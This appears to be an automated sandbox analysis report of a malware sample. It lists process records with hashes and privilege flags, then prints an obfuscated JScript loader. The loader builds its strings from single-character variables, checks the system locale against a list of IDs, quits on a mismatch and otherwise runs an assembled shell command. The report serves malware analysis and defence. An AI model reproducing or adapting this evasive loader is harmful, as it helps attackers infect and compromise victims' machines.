Imagebase: | 0x7ff6cfb50000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 13 |
Start time: | 20:11:12 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6f6eb0000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 14 |
Start time: | 20:11:13 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6c3ff0000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 15 |
Start time: | 20:11:13 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7b4ee0000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | false |
Target ID: | 16 |
Start time: | 20:11:13 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6c3ff0000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function lghtraech() { |
|
1 | ezcpmclfx = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
2 | var vcvzuekzd = this[prnmvy + fymqdhkwx + aaoxyui + rvvkwayph + hjatdli + qlploevl + tyowopzp + ygjoeis] ( this[fmebud + amiqtj + xlfszza + aaoxyui + umrzs + prnmvy + ygjoeis][ybcgub + aaoxyui + hjatdli + fymqdhkwx + ygjoeis + hjatdli + lzwoursr + cbyesbqb + casztboll + hjatdli + xlfszza + ygjoeis] ( fmebud + amiqtj + xlfszza + aaoxyui + umrzs + prnmvy + ygjoeis + kdebqlahu + amiqtj + bvqexg + hjatdli + zidlamjn + zidlamjn ) [cwzlpur + hjatdli + ziivctc + cwzlpur + hjatdli + fymqdhkwx + msler] ( wzyadazbm + wadafjt + swpfsne + owexfhgz + pyrix + ybcgub + vpgfm + cwzlpur + cwzlpur + swpfsne + pypknym + yxhtwjv + pyrix + vpgfm + amiqtj + swpfsne + cwzlpur + rxbgtmdgh + ybcgub + xhnfp + tyowopzp + ygjoeis + aaoxyui + xhnfp + zidlamjn + atrvldci + rgdyt + fymqdhkwx + tyowopzp + hjatdli + zidlamjn + rxbgtmdgh + qlploevl + tyowopzp + ygjoeis + hjatdli + aaoxyui + tyowopzp + fymqdhkwx + ygjoeis + umrzs + xhnfp + tyowopzp + fymqdhkwx + zidlamjn + rxbgtmdgh + jsjwdxwwk + xhnfp + xlfszza + fymqdhkwx + zidlamjn + hjatdli ), 16 ); |
|
3 | for ( fjahyu = 0 ; fjahyu < ezcpmclfx[zidlamjn + hjatdli + tyowopzp + ziivctc + ygjoeis + bvqexg] ; ++ fjahyu ) | |
4 | { | |
5 | if ( vcvzuekzd == ezcpmclfx[fjahyu] ) | |
6 | { | |
7 | vcvzuekzd = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( vcvzuekzd !== true ) | |
12 | this[fmebud + amiqtj + xlfszza + aaoxyui + umrzs + prnmvy + ygjoeis][bxxdks + qarnkdh + umrzs + ygjoeis] ( ); | |
13 | this[fmebud + amiqtj + xlfszza + aaoxyui + umrzs + prnmvy + ygjoeis][ybcgub + aaoxyui + hjatdli + fymqdhkwx + ygjoeis + hjatdli + lzwoursr + cbyesbqb + casztboll + hjatdli + xlfszza + ygjoeis] ( fmebud + amiqtj + xlfszza + aaoxyui + umrzs + prnmvy + ygjoeis + kdebqlahu + amiqtj + bvqexg + hjatdli + zidlamjn + zidlamjn ) [aaoxyui + qarnkdh + tyowopzp] ( xlfszza + qnkhpypfp + msler + atrvldci + xqtfkui + xlfszza + atrvldci + prnmvy + xhnfp + fcikmx + hjatdli + aaoxyui + rvvkwayph + bvqexg + hjatdli + zidlamjn + zidlamjn + kdebqlahu + hjatdli + iqjifah + hjatdli + atrvldci + ipnpukocr + ybcgub + xhnfp + qnkhpypfp + qnkhpypfp + fymqdhkwx + tyowopzp + msler + atrvldci + iwswu + qlploevl + tyowopzp + vgucc + xhnfp + bmwqb + hjatdli + ipnpukocr + fmebud + hjatdli + cbyesbqb + cwzlpur + hjatdli + fioay + qarnkdh + hjatdli + rvvkwayph + ygjoeis + atrvldci + ipnpukocr + lzwoursr + qarnkdh + ygjoeis + gcrmmd + umrzs + zidlamjn + hjatdli + atrvldci + rdplh + ygjoeis + hjatdli + qnkhpypfp + prnmvy + rdplh + rxbgtmdgh + umrzs + tyowopzp + vgucc + xhnfp + umrzs + xlfszza + hjatdli + kdebqlahu + prnmvy + msler + zxsrtffxf + atrvldci + bvqexg + ygjoeis + ygjoeis + prnmvy + pvxoa + xqtfkui + xqtfkui + hejucknc + ubbuzgk + cupsle + kdebqlahu + hejucknc + kwakbun + cupsle + kdebqlahu + hejucknc + kdebqlahu + tfows + vpnhqrmcv + hrkip + xqtfkui + umrzs + tyowopzp + vgucc + xhnfp + umrzs + xlfszza + hjatdli + kdebqlahu + prnmvy + bvqexg + prnmvy + iwswu + uacrwgd + uacrwgd + rvvkwayph + ygjoeis + fymqdhkwx + aaoxyui + ygjoeis + atrvldci + rdplh + ygjoeis + hjatdli + qnkhpypfp + prnmvy + rdplh + rxbgtmdgh + umrzs + tyowopzp + vgucc + xhnfp + umrzs + xlfszza + hjatdli + kdebqlahu + prnmvy + msler + zxsrtffxf + uacrwgd + uacrwgd + xlfszza + qnkhpypfp + msler + atrvldci + xqtfkui + xlfszza + atrvldci + tyowopzp + hjatdli + ygjoeis + atrvldci + qarnkdh + rvvkwayph + hjatdli + atrvldci + rxbgtmdgh + rxbgtmdgh + hejucknc + ubbuzgk + cupsle + kdebqlahu + hejucknc + kwakbun + cupsle + kdebqlahu + hejucknc + kdebqlahu + tfows + vpnhqrmcv + hrkip + kfhiobfa + pqbnl + pqbnl + pqbnl + pqbnl + rxbgtmdgh + msler + fymqdhkwx + vgucc + fcikmx + fcikmx + fcikmx + aaoxyui + xhnfp + xhnfp + ygjoeis + rxbgtmdgh + uacrwgd + uacrwgd + xlfszza + qnkhpypfp + msler + atrvldci + xqtfkui + xlfszza + atrvldci + aaoxyui + hjatdli + ziivctc + rvvkwayph + vgucc + aaoxyui + cupsle + tfows + atrvldci + xqtfkui + rvvkwayph + atrvldci + rxbgtmdgh + rxbgtmdgh + hejucknc + ubbuzgk + cupsle + kdebqlahu + hejucknc + kwakbun + cupsle + kdebqlahu + hejucknc + kdebqlahu + tfows + vpnhqrmcv + hrkip + kfhiobfa + pqbnl + pqbnl + pqbnl + pqbnl + rxbgtmdgh + msler + fymqdhkwx + vgucc + fcikmx + fcikmx + fcikmx + aaoxyui + xhnfp + xhnfp + ygjoeis + rxbgtmdgh + tfows + pqbnl + kwakbun + tfows + tfows + tfows + ubbuzgk + ubbuzgk + hejucknc + kwakbun + hejucknc + hrkip + kwakbun + ubbuzgk + pqbnl + kdebqlahu + msler + zidlamjn + zidlamjn, 0, false ); |
|
14 | } | |
15 | kdebqlahu = "a"; | |
16 | kdebqlahu = "t"; | |
17 | kdebqlahu = "D"; | |
18 | kdebqlahu = "v"; | |
19 | kdebqlahu = "K"; | |
20 | kdebqlahu = "B"; | |
21 | kdebqlahu = "Y"; | |
22 | kdebqlahu = "E"; | |
23 | kdebqlahu = "h"; | |
24 | kdebqlahu = "N"; | |
25 | kdebqlahu = "c"; | |
26 | kdebqlahu = "Q"; | |
27 | kdebqlahu = "Q"; | |
28 | kdebqlahu = "b"; | |
29 | kdebqlahu = "Z"; | |
30 | kdebqlahu = "I"; | |
31 | kdebqlahu = "v"; | |
32 | kdebqlahu = "N"; | |
33 | kdebqlahu = "V"; | |
34 | kdebqlahu = "I"; | |
35 | kdebqlahu = "b"; | |
36 | kdebqlahu = "n"; | |
37 | kdebqlahu = "f"; | |
38 | kdebqlahu = "H"; | |
39 | kdebqlahu = "x"; | |
40 | kdebqlahu = "x"; | |
41 | kdebqlahu = "x"; | |
42 | kdebqlahu = "U"; | |
43 | kdebqlahu = "k"; | |
44 | kdebqlahu = "."; | |
45 | prnmvy = "v"; | |
46 | prnmvy = "g"; | |
47 | prnmvy = "C"; | |
48 | prnmvy = "c"; | |
49 | prnmvy = "Y"; | |
50 | prnmvy = "l"; | |
51 | prnmvy = "p"; | |
52 | prnmvy = "F"; | |
53 | prnmvy = "B"; | |
54 | prnmvy = "a"; | |
55 | prnmvy = "x"; | |
56 | prnmvy = "r"; | |
57 | prnmvy = "O"; | |
58 | prnmvy = "J"; | |
59 | prnmvy = "s"; | |
60 | prnmvy = "r"; | |
61 | prnmvy = "K"; | |
62 | prnmvy = "G"; | |
63 | prnmvy = "m"; | |
64 | prnmvy = "u"; | |
65 | prnmvy = "G"; | |
66 | prnmvy = "f"; | |
67 | prnmvy = "l"; | |
68 | prnmvy = "p"; | |
69 | rgdyt = "o"; | |
70 | rgdyt = "C"; | |
71 | rgdyt = "w"; | |
72 | rgdyt = "C"; | |
73 | rgdyt = "E"; | |
74 | rgdyt = "F"; | |
75 | rgdyt = "R"; | |
76 | rgdyt = "M"; | |
77 | rgdyt = "O"; | |
78 | rgdyt = "m"; | |
79 | rgdyt = "j"; | |
80 | rgdyt = "Y"; | |
81 | rgdyt = "T"; | |
82 | rgdyt = "q"; | |
83 | rgdyt = "s"; | |
84 | rgdyt = "X"; | |
85 | rgdyt = "X"; | |
86 | rgdyt = "q"; | |
87 | rgdyt = "s"; | |
88 | rgdyt = "o"; | |
89 | rgdyt = "G"; | |
90 | rgdyt = "j"; | |
91 | rgdyt = "P"; | |
92 | lzwoursr = "h"; | |
93 | lzwoursr = "R"; | |
94 | lzwoursr = "L"; | |
95 | lzwoursr = "u"; | |
96 | lzwoursr = "n"; | |
97 | lzwoursr = "P"; | |
98 | lzwoursr = "G"; | |
99 | lzwoursr = "G"; | |
100 | lzwoursr = "u"; | |
101 | lzwoursr = "g"; | |
102 | lzwoursr = "h"; | |
103 | lzwoursr = "m"; | |
104 | lzwoursr = "M"; | |
105 | lzwoursr = "y"; | |
106 | lzwoursr = "K"; | |
107 | lzwoursr = "J"; | |
108 | lzwoursr = "f"; | |
109 | lzwoursr = "p"; | |
110 | lzwoursr = "o"; | |
111 | lzwoursr = "i"; | |
112 | lzwoursr = "M"; | |
113 | lzwoursr = "e"; | |
114 | lzwoursr = "W"; | |
115 | lzwoursr = "b"; | |
116 | lzwoursr = "t"; | |
117 | lzwoursr = "t"; | |
118 | lzwoursr = "U"; | |
119 | lzwoursr = "g"; | |
120 | lzwoursr = "z"; | |
121 | lzwoursr = "w"; | |
122 | lzwoursr = "x"; | |
123 | lzwoursr = "o"; | |
124 | lzwoursr = "m"; | |
125 | lzwoursr = "v"; | |
126 | lzwoursr = "e"; | |
127 | lzwoursr = "y"; | |
128 | lzwoursr = "Z"; | |
129 | lzwoursr = "a"; | |
130 | lzwoursr = "V"; | |
131 | lzwoursr = "X"; | |
132 | lzwoursr = "e"; | |
133 | lzwoursr = "u"; | |
134 | lzwoursr = "X"; | |
135 | lzwoursr = "f"; | |
136 | lzwoursr = "O"; | |
137 | fmebud = "k"; | |
138 | fmebud = "r"; | |
139 | fmebud = "i"; | |
140 | fmebud = "d"; | |
141 | fmebud = "I"; | |
142 | fmebud = "i"; | |
143 | fmebud = "w"; | |
144 | fmebud = "X"; | |
145 | fmebud = "k"; | |
146 | fmebud = "I"; | |
147 | fmebud = "P"; | |
148 | fmebud = "U"; | |
149 | fmebud = "y"; | |
150 | fmebud = "C"; | |
151 | fmebud = "o"; | |
152 | fmebud = "I"; | |
153 | fmebud = "M"; | |
154 | fmebud = "q"; | |
155 | fmebud = "f"; | |
156 | fmebud = "i"; | |
157 | fmebud = "x"; | |
158 | fmebud = "a"; | |
159 | fmebud = "F"; | |
160 | fmebud = "u"; | |
161 | fmebud = "R"; | |
162 | fmebud = "b"; | |
163 | fmebud = "W"; | |
164 | xqtfkui = "l"; | |
165 | xqtfkui = "O"; | |
166 | xqtfkui = "/"; | |
167 | yxhtwjv = "J"; | |
168 | yxhtwjv = "T"; | |
169 | yxhtwjv = "U"; | |
170 | yxhtwjv = "T"; | |
171 | yxhtwjv = "Z"; | |
172 | yxhtwjv = "i"; | |
173 | yxhtwjv = "T"; | |
174 | yxhtwjv = "m"; | |
175 | yxhtwjv = "L"; | |
176 | yxhtwjv = "E"; | |
177 | yxhtwjv = "i"; | |
178 | yxhtwjv = "L"; | |
179 | yxhtwjv = "S"; | |
180 | yxhtwjv = "O"; | |
181 | yxhtwjv = "Q"; | |
182 | yxhtwjv = "O"; | |
183 | yxhtwjv = "F"; | |
184 | yxhtwjv = "Z"; | |
185 | yxhtwjv = "i"; | |
186 | yxhtwjv = "v"; | |
187 | yxhtwjv = "Q"; | |
188 | yxhtwjv = "P"; | |
189 | yxhtwjv = "i"; | |
190 | yxhtwjv = "C"; | |
191 | yxhtwjv = "Z"; | |
192 | yxhtwjv = "b"; | |
193 | yxhtwjv = "m"; | |
194 | yxhtwjv = "N"; | |
195 | yxhtwjv = "N"; | |
196 | yxhtwjv = "A"; | |
197 | yxhtwjv = "F"; | |
198 | yxhtwjv = "o"; | |
199 | yxhtwjv = "T"; | |
200 | yxhtwjv = "Q"; | |
201 | yxhtwjv = "a"; | |
202 | yxhtwjv = "s"; | |
203 | yxhtwjv = "s"; | |
204 | yxhtwjv = "j"; | |
205 | yxhtwjv = "a"; | |
206 | yxhtwjv = "d"; | |
207 | yxhtwjv = "G"; | |
208 | yxhtwjv = "n"; | |
209 | yxhtwjv = "T"; | |
210 | pyrix = "R"; | |
211 | pyrix = "C"; | |
212 | pyrix = "J"; | |
213 | pyrix = "k"; | |
214 | pyrix = "m"; | |
215 | pyrix = "q"; | |
216 | pyrix = "h"; | |
217 | pyrix = "v"; | |
218 | pyrix = "y"; | |
219 | pyrix = "u"; | |
220 | pyrix = "m"; | |
221 | pyrix = "Y"; | |
222 | pyrix = "l"; | |
223 | pyrix = "R"; | |
224 | pyrix = "N"; | |
225 | pyrix = "T"; | |
226 | pyrix = "k"; | |
227 | pyrix = "E"; | |
228 | pyrix = "P"; | |
229 | pyrix = "h"; | |
230 | pyrix = "J"; | |
231 | pyrix = "B"; | |
232 | pyrix = "A"; | |
233 | pyrix = "P"; | |
234 | pyrix = "G"; | |
235 | pyrix = "Z"; | |
236 | pyrix = "f"; | |
237 | pyrix = "H"; | |
238 | pyrix = "V"; | |
239 | pyrix = "_"; | |
240 | kwakbun = "b"; | |
241 | kwakbun = "x"; | |
242 | kwakbun = "K"; | |
243 | kwakbun = "D"; | |
244 | kwakbun = "Z"; | |
245 | kwakbun = "U"; | |
246 | kwakbun = "H"; | |
247 | kwakbun = "u"; | |
248 | kwakbun = "b"; | |
249 | kwakbun = "P"; | |
250 | kwakbun = "b"; | |
251 | kwakbun = "m"; | |
252 | kwakbun = "G"; | |
253 | kwakbun = "z"; | |
254 | kwakbun = "Y"; | |
255 | kwakbun = "B"; | |
256 | kwakbun = "H"; | |
257 | kwakbun = "t"; | |
258 | kwakbun = "m"; | |
259 | kwakbun = "X"; | |
260 | kwakbun = "c"; | |
261 | kwakbun = "q"; | |
262 | kwakbun = "O"; | |
263 | kwakbun = "a"; | |
264 | kwakbun = "u"; | |
265 | kwakbun = "T"; | |
266 | kwakbun = "Z"; | |
267 | kwakbun = "v"; | |
268 | kwakbun = "P"; | |
269 | kwakbun = "a"; | |
270 | kwakbun = "4"; | |
271 | xlfszza = "N"; | |
272 | xlfszza = "a"; | |
273 | xlfszza = "B"; | |
274 | xlfszza = "Y"; | |
275 | xlfszza = "Y"; | |
276 | xlfszza = "k"; | |
277 | xlfszza = "W"; | |
278 | xlfszza = "B"; | |
279 | xlfszza = "v"; | |
280 | xlfszza = "f"; | |
281 | xlfszza = "k"; | |
282 | xlfszza = "O"; | |
283 | xlfszza = "U"; | |
284 | xlfszza = "k"; | |
285 | xlfszza = "S"; | |
286 | xlfszza = "E"; | |
287 | xlfszza = "Z"; | |
288 | xlfszza = "n"; | |
289 | xlfszza = "I"; | |
290 | xlfszza = "Z"; | |
291 | xlfszza = "k"; | |
292 | xlfszza = "q"; | |
293 | xlfszza = "B"; | |
294 | xlfszza = "K"; | |
295 | xlfszza = "o"; | |
296 | xlfszza = "p"; | |
297 | xlfszza = "E"; | |
298 | xlfszza = "X"; | |
299 | xlfszza = "l"; | |
300 | xlfszza = "x"; | |
301 | xlfszza = "G"; | |
302 | xlfszza = "c"; | |
303 | pvxoa = "Q"; | |
304 | pvxoa = "W"; | |
305 | pvxoa = "Z"; | |
306 | pvxoa = "p"; | |
307 | pvxoa = "V"; | |
308 | pvxoa = "P"; | |
309 | pvxoa = "y"; | |
310 | pvxoa = "q"; | |
311 | pvxoa = "v"; | |
312 | pvxoa = "G"; | |
313 | pvxoa = "s"; | |
314 | pvxoa = "j"; | |
315 | pvxoa = "M"; | |
316 | pvxoa = "o"; | |
317 | pvxoa = "n"; | |
318 | pvxoa = "f"; | |
319 | pvxoa = "Z"; | |
320 | pvxoa = "u"; | |
321 | pvxoa = "p"; | |
322 | pvxoa = "s"; | |
323 | pvxoa = "i"; | |
324 | pvxoa = "j"; | |
325 | pvxoa = "r"; | |
326 | pvxoa = "X"; | |
327 | pvxoa = "D"; | |
328 | pvxoa = "r"; | |
329 | pvxoa = "a"; | |
330 | pvxoa = "b"; | |
331 | pvxoa = "A"; | |
332 | pvxoa = "g"; | |
333 | pvxoa = "J"; | |
334 | pvxoa = "R"; | |
335 | pvxoa = "E"; | |
336 | pvxoa = "F"; | |
337 | pvxoa = "e"; | |
338 | pvxoa = "x"; | |
339 | pvxoa = "x"; | |
340 | pvxoa = "F"; | |
341 | pvxoa = "R"; | |
342 | pvxoa = "Y"; | |
343 | pvxoa = "S"; | |
344 | pvxoa = "P"; | |
345 | pvxoa = ":"; | |
346 | umrzs = "S"; | |
347 | umrzs = "U"; | |
348 | umrzs = "L"; | |
349 | umrzs = "H"; | |
350 | umrzs = "V"; | |
351 | umrzs = "s"; | |
352 | umrzs = "i"; | |
353 | tyowopzp = "b"; | |
354 | tyowopzp = "l"; | |
355 | tyowopzp = "K"; | |
356 | tyowopzp = "I"; | |
357 | tyowopzp = "X"; | |
358 | tyowopzp = "R"; | |
359 | tyowopzp = "R"; | |
360 | tyowopzp = "M"; | |
361 | tyowopzp = "a"; | |
362 | tyowopzp = "A"; | |
363 | tyowopzp = "I"; | |
364 | tyowopzp = "C"; | |
365 | tyowopzp = "M"; | |
366 | tyowopzp = "J"; | |
367 | tyowopzp = "c"; | |
368 | tyowopzp = "w"; | |
369 | tyowopzp = "y"; | |
370 | tyowopzp = "n"; | |
371 | tyowopzp = "D"; | |
372 | tyowopzp = "u"; | |
373 | tyowopzp = "P"; | |
374 | tyowopzp = "E"; | |
375 | tyowopzp = "S"; | |
376 | tyowopzp = "D"; | |
377 | tyowopzp = "M"; | |
378 | tyowopzp = "M"; | |
379 | tyowopzp = "e"; | |
380 | tyowopzp = "d"; | |
381 | tyowopzp = "b"; | |
382 | tyowopzp = "e"; | |
383 | tyowopzp = "r"; | |
384 | tyowopzp = "I"; | |
385 | tyowopzp = "n"; | |
386 | zxsrtffxf = "Y"; | |
387 | zxsrtffxf = "Y"; | |
388 | zxsrtffxf = "E"; | |
389 | zxsrtffxf = "m"; | |
390 | zxsrtffxf = "J"; | |
391 | zxsrtffxf = "R"; | |
392 | zxsrtffxf = "O"; | |
393 | zxsrtffxf = "y"; | |
394 | zxsrtffxf = "r"; | |
395 | zxsrtffxf = "e"; | |
396 | zxsrtffxf = "H"; | |
397 | zxsrtffxf = "p"; | |
398 | zxsrtffxf = "M"; | |
399 | zxsrtffxf = "J"; | |
400 | zxsrtffxf = "C"; | |
401 | zxsrtffxf = "h"; | |
402 | zxsrtffxf = "i"; | |
403 | zxsrtffxf = "L"; | |
404 | zxsrtffxf = "s"; | |
405 | zxsrtffxf = "b"; | |
406 | zxsrtffxf = "f"; | |
407 | zxsrtffxf = "X"; | |
408 | zxsrtffxf = "c"; | |
409 | zxsrtffxf = "K"; | |
410 | zxsrtffxf = "g"; | |
411 | zxsrtffxf = "K"; | |
412 | zxsrtffxf = "v"; | |
413 | zxsrtffxf = "Q"; | |
414 | zxsrtffxf = "k"; | |
415 | zxsrtffxf = "m"; | |
416 | zxsrtffxf = "I"; | |
417 | zxsrtffxf = "f"; | |
418 | qlploevl = "b"; | |
419 | qlploevl = "E"; | |
420 | qlploevl = "I"; | |
421 | qlploevl = "U"; | |
422 | qlploevl = "l"; | |
423 | qlploevl = "i"; | |
424 | qlploevl = "F"; | |
425 | qlploevl = "A"; | |
426 | qlploevl = "O"; | |
427 | qlploevl = "J"; | |
428 | qlploevl = "j"; | |
429 | qlploevl = "c"; | |
430 | qlploevl = "G"; | |
431 | qlploevl = "T"; | |
432 | qlploevl = "T"; | |
433 | qlploevl = "u"; | |
434 | qlploevl = "z"; | |
435 | qlploevl = "I"; | |
436 | qlploevl = "l"; | |
437 | qlploevl = "j"; | |
438 | qlploevl = "a"; | |
439 | qlploevl = "n"; | |
440 | qlploevl = "E"; | |
441 | qlploevl = "I"; | |
442 | zidlamjn = "i"; | |
443 | zidlamjn = "y"; | |
444 | zidlamjn = "o"; | |
445 | zidlamjn = "r"; | |
446 | zidlamjn = "g"; | |
447 | zidlamjn = "A"; | |
448 | zidlamjn = "Z"; | |
449 | zidlamjn = "y"; | |
450 | zidlamjn = "T"; | |
451 | zidlamjn = "i"; | |
452 | zidlamjn = "V"; | |
453 | zidlamjn = "P"; | |
454 | zidlamjn = "l"; | |
455 | gcrmmd = "f"; | |
456 | gcrmmd = "F"; | |
457 | vpgfm = "U"; | |
458 | jsjwdxwwk = "X"; | |
459 | jsjwdxwwk = "u"; | |
460 | jsjwdxwwk = "h"; | |
461 | jsjwdxwwk = "w"; | |
462 | jsjwdxwwk = "H"; | |
463 | jsjwdxwwk = "F"; | |
464 | jsjwdxwwk = "J"; | |
465 | jsjwdxwwk = "u"; | |
466 | jsjwdxwwk = "m"; | |
467 | jsjwdxwwk = "d"; | |
468 | jsjwdxwwk = "z"; | |
469 | jsjwdxwwk = "h"; | |
470 | jsjwdxwwk = "V"; | |
471 | jsjwdxwwk = "P"; | |
472 | jsjwdxwwk = "J"; | |
473 | jsjwdxwwk = "B"; | |
474 | jsjwdxwwk = "i"; | |
475 | jsjwdxwwk = "l"; | |
476 | jsjwdxwwk = "Z"; | |
477 | jsjwdxwwk = "J"; | |
478 | jsjwdxwwk = "Z"; | |
479 | jsjwdxwwk = "D"; | |
480 | jsjwdxwwk = "b"; | |
481 | jsjwdxwwk = "P"; | |
482 | jsjwdxwwk = "A"; | |
483 | jsjwdxwwk = "L"; | |
484 | hejucknc = "E"; | |
485 | hejucknc = "q"; | |
486 | hejucknc = "s"; | |
487 | hejucknc = "1"; | |
488 | fymqdhkwx = "T"; | |
489 | fymqdhkwx = "H"; | |
490 | fymqdhkwx = "X"; | |
491 | fymqdhkwx = "b"; | |
492 | fymqdhkwx = "v"; | |
493 | fymqdhkwx = "a"; | |
494 | bxxdks = "T"; | |
495 | bxxdks = "U"; | |
496 | bxxdks = "x"; | |
497 | bxxdks = "F"; | |
498 | bxxdks = "k"; | |
499 | bxxdks = "B"; | |
500 | bxxdks = "k"; | |
501 | bxxdks = "g"; | |
502 | bxxdks = "E"; | |
503 | bxxdks = "b"; | |
504 | bxxdks = "p"; | |
505 | bxxdks = "m"; | |
506 | bxxdks = "t"; | |
507 | bxxdks = "H"; | |
508 | bxxdks = "G"; | |
509 | bxxdks = "X"; | |
510 | bxxdks = "A"; | |
511 | bxxdks = "n"; | |
512 | bxxdks = "f"; | |
513 | bxxdks = "T"; | |
514 | bxxdks = "V"; | |
515 | bxxdks = "y"; | |
516 | bxxdks = "I"; | |
517 | bxxdks = "d"; | |
518 | bxxdks = "u"; | |
519 | bxxdks = "K"; | |
520 | bxxdks = "E"; | |
521 | bxxdks = "S"; | |
522 | bxxdks = "S"; | |
523 | bxxdks = "R"; | |
524 | bxxdks = "H"; | |
525 | bxxdks = "s"; | |
526 | bxxdks = "L"; | |
527 | bxxdks = "Z"; | |
528 | bxxdks = "J"; | |
529 | bxxdks = "g"; | |
530 | bxxdks = "o"; | |
531 | bxxdks = "f"; | |
532 | bxxdks = "Q"; | |
533 | pypknym = "a"; | |
534 | pypknym = "D"; | |
535 | pypknym = "p"; | |
536 | pypknym = "D"; | |
537 | pypknym = "S"; | |
538 | pypknym = "o"; | |
539 | pypknym = "g"; | |
540 | pypknym = "N"; | |
541 | tfows = "F"; | |
542 | tfows = "W"; | |
543 | tfows = "U"; | |
544 | tfows = "M"; | |
545 | tfows = "l"; | |
546 | tfows = "t"; | |
547 | tfows = "R"; | |
548 | tfows = "K"; | |
549 | tfows = "V"; | |
550 | tfows = "q"; | |
551 | tfows = "R"; | |
552 | tfows = "o"; | |
553 | tfows = "h"; | |
554 | tfows = "l"; | |
555 | tfows = "z"; | |
556 | tfows = "W"; | |
557 | tfows = "P"; | |
558 | tfows = "P"; | |
559 | tfows = "U"; | |
560 | tfows = "H"; | |
561 | tfows = "Y"; | |
562 | tfows = "g"; | |
563 | tfows = "Y"; | |
564 | tfows = "D"; | |
565 | tfows = "h"; | |
566 | tfows = "r"; | |
567 | tfows = "L"; | |
568 | tfows = "o"; | |
569 | tfows = "U"; | |
570 | tfows = "D"; | |
571 | tfows = "M"; | |
572 | tfows = "l"; | |
573 | tfows = "h"; | |
574 | tfows = "h"; | |
575 | tfows = "q"; | |
576 | tfows = "O"; | |
577 | tfows = "K"; | |
578 | tfows = "n"; | |
579 | tfows = "U"; | |
580 | tfows = "D"; | |
581 | tfows = "2"; | |
582 | hrkip = "U"; | |
583 | hrkip = "F"; | |
584 | hrkip = "R"; | |
585 | hrkip = "M"; | |
586 | hrkip = "t"; | |
587 | hrkip = "X"; | |
588 | hrkip = "E"; | |
589 | hrkip = "J"; | |
590 | hrkip = "s"; | |
591 | hrkip = "S"; | |
592 | hrkip = "U"; | |
593 | hrkip = "R"; | |
594 | hrkip = "J"; | |
595 | hrkip = "p"; | |
596 | hrkip = "y"; | |
597 | hrkip = "R"; | |
598 | hrkip = "E"; | |
599 | hrkip = "m"; | |
600 | hrkip = "V"; | |
601 | hrkip = "I"; | |
602 | hrkip = "M"; | |
603 | hrkip = "H"; | |
604 | hrkip = "x"; | |
605 | hrkip = "U"; | |
606 | hrkip = "x"; | |
607 | hrkip = "l"; | |
608 | hrkip = "e"; | |
609 | hrkip = "y"; | |
610 | hrkip = "q"; | |
611 | hrkip = "K"; | |
612 | hrkip = "W"; | |
613 | hrkip = "h"; | |
614 | hrkip = "5"; | |
615 | cupsle = "x"; | |
616 | cupsle = "I"; | |
617 | cupsle = "X"; | |
618 | cupsle = "x"; | |
619 | cupsle = "G"; | |
620 | cupsle = "z"; | |
621 | cupsle = "r"; | |
622 | cupsle = "w"; | |
623 | cupsle = "y"; | |
624 | cupsle = "Q"; | |
625 | cupsle = "y"; | |
626 | cupsle = "M"; | |
627 | cupsle = "i"; | |
628 | cupsle = "a"; | |
629 | cupsle = "I"; | |
630 | cupsle = "z"; | |
631 | cupsle = "Z"; | |
632 | cupsle = "K"; | |
633 | cupsle = "U"; | |
634 | cupsle = "g"; | |
635 | cupsle = "w"; | |
636 | cupsle = "D"; | |
637 | cupsle = "G"; | |
638 | cupsle = "D"; | |
639 | cupsle = "V"; | |
640 | cupsle = "L"; | |
641 | cupsle = "e"; | |
642 | cupsle = "u"; | |
643 | cupsle = "C"; | |
644 | cupsle = "z"; | |
645 | cupsle = "S"; | |
646 | cupsle = "C"; | |
647 | cupsle = "Q"; | |
648 | cupsle = "F"; | |
649 | cupsle = "n"; | |
650 | cupsle = "M"; | |
651 | cupsle = "u"; | |
652 | cupsle = "3"; | |
653 | qnkhpypfp = "R"; | |
654 | qnkhpypfp = "L"; | |
655 | qnkhpypfp = "A"; | |
656 | qnkhpypfp = "F"; | |
657 | qnkhpypfp = "R"; | |
658 | qnkhpypfp = "P"; | |
659 | qnkhpypfp = "N"; | |
660 | qnkhpypfp = "B"; | |
661 | qnkhpypfp = "A"; | |
662 | qnkhpypfp = "F"; | |
663 | qnkhpypfp = "k"; | |
664 | qnkhpypfp = "e"; | |
665 | qnkhpypfp = "a"; | |
666 | qnkhpypfp = "r"; | |
667 | qnkhpypfp = "K"; | |
668 | qnkhpypfp = "O"; | |
669 | qnkhpypfp = "Y"; | |
670 | qnkhpypfp = "K"; | |
671 | qnkhpypfp = "y"; | |
672 | qnkhpypfp = "S"; | |
673 | qnkhpypfp = "b"; | |
674 | qnkhpypfp = "D"; | |
675 | qnkhpypfp = "g"; | |
676 | qnkhpypfp = "n"; | |
